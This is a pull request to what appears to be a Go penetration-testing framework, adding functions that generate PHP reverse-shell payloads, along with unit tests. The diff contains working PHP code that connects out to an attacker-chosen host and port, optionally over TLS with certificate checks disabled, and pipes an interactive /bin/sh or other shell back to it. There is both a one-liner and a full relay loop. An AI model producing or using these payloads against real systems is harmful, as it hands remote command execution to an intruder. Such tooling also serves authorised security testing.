### PR TITLE
Added PHP Reverse Shells

### DIFF
--- a/payload/reverse.go
+++ b/payload/reverse.go
@@ -201,3 +201,58 @@ while (!s.isClosed()) {
 p.destroy();
 s.close();`, lhost, lport)
 }
+
+// A short payload that creates a reverse shell using /bin/sh -i.
+func ShortPHPLinuxInteractive(lhost string, lport int) string {
+	return fmt.Sprintf(`<? $sock=fsockopen("%s",%d);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>`, lhost, lport)
+}
+
+// Creates an encrypted reverse shell using PHP. The user can specify the shell used, for example
+// cmd.exe, /bin/sh, etc. The user also specifies if the reverse shell should be encrypted or not.
+//
+// payload.UnflattenedPHP("10.9.49.80", 1270, "/bin/sh", true).
+func UnflattenedPHP(lhost string, lport int, shell string, encrypted bool) string {
+	hostname := fmt.Sprintf("%s:%d", lhost, lport)
+	if encrypted {
+		hostname = "tls://" + hostname
+	}
+
+	return fmt.Sprintf(`<?
+$context = stream_context_create([
+	'ssl' => [
+		'verify_peer' => false,
+		'verify_peer_name' => false
+	]
+]);
+
+$stream = stream_socket_client("%s", $errno, $errstr, ini_get("default_socket_timeout"), STREAM_CLIENT_CONNECT, $context);
+$process = proc_open("%s", array(0=>array("pipe", "r"), 1=>array("pipe", "w"), 2=>array("pipe", "w")), $pipes);
+stream_set_blocking($stream, 0);
+stream_set_blocking($pipes[0], 0);
+stream_set_blocking($pipes[1], 0);
+stream_set_blocking($pipes[2], 0);
+while(true) {
+	if (feof($stream) || feof($pipes[1])) {
+		break;
+	}
+
+	$readArray = array($stream, $pipes[1], $pipes[2]);
+	$empty = null;
+	$selected = stream_select($readArray, $empty, $empty, null);
+
+	if (in_array($stream, $readArray)) {
+		$sockData = fgets($stream);
+		fwrite($pipes[0], $sockData);
+	}
+	if (in_array($pipes[1], $readArray)) {
+		$procOut = fgets($pipes[1]);
+		fwrite($stream, $procOut);
+	}
+	if (in_array($pipes[2], $readArray)) {
+		$procErr = fgets($pipes[2]);
+		fwrite($stream, $procErr);
+	}
+}
+
+?>`, hostname, shell)
+}

--- a/payload/reverse_test.go
+++ b/payload/reverse_test.go
@@ -108,3 +108,28 @@ func TestReverseShellMkfifoOpenSSL(t *testing.T) {
 
 	t.Log(payload)
 }
+
+func TestShortPHPLinuxInteractive(t *testing.T) {
+	payload := ShortPHPLinuxInteractive("127.0.0.2", 8181)
+	if !strings.Contains(payload, `$sock=fsockopen("127.0.0.2",8181);$proc=proc_open("/bin/sh -i"`) {
+		t.Fatal(payload)
+	}
+}
+
+func TestUnflattenedPHP(t *testing.T) {
+	payload := UnflattenedPHP("127.0.0.1", 8989, "/bin/sh", true)
+	if !strings.Contains(payload, `stream_socket_client("tls://127.0.0.1:8989",`) {
+		t.Fatal(payload)
+	}
+	if !strings.Contains(payload, `proc_open("/bin/sh",`) {
+		t.Fatal(payload)
+	}
+
+	payload = UnflattenedPHP("127.0.0.1", 8989, "/bin/bash", false)
+	if !strings.Contains(payload, `stream_socket_client("127.0.0.1:8989",`) {
+		t.Fatal(payload)
+	}
+	if !strings.Contains(payload, `proc_open("/bin/bash",`) {
+		t.Fatal(payload)
+	}
+}


### PR DESCRIPTION
Example usage:

```sh
generated = payload.UnflattenedPHP(conf.Lhost, conf.Lport, "/bin/bash", true)
```

or

```
generated = payload.ShortPHPLinuxInteractive(conf.Lhost, conf.Lport)
```